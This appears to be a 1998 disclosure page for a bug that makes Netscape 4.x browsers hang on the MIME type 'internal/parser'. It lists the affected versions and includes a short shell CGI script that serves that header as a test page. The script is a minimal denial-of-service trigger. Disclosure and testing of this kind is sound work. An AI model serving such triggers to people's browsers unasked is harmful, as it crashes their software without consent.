Netscape 4.x hangs on internal/parser MIME type; some versions vulnerable, Macintosh unaffected.

Netscape 4.x "internal/parser" bug

Some versions of Netscape will simply hang when given a MIME type of internal/parser. Netscape was never designed to handle this type coming from
the outside world.

Versions 4.04 through the most current release (4.5PR2) are, for the most part, vulnerable. Macintosh versions of Netscape do not seem affected by
this bug.

This bug was discovered by me on October 2, 1998. It has been reported to Netscape.

The link below points to the following CGI script:

#!/bin/sh
echo Content-type: internal/parser
echo
echo Your browser is unaffected by this bug.
echo Use your 'Back' button to return.
